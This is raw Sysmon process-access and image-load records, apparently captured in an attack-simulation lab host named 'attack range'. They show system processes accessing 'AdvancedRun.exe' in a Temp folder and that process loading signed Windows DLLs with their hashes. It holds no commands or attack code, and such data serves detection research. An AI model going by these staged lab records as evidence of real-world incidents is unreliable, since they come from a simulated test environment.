18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.914{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004011112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.805{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.805{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.742{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.742{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
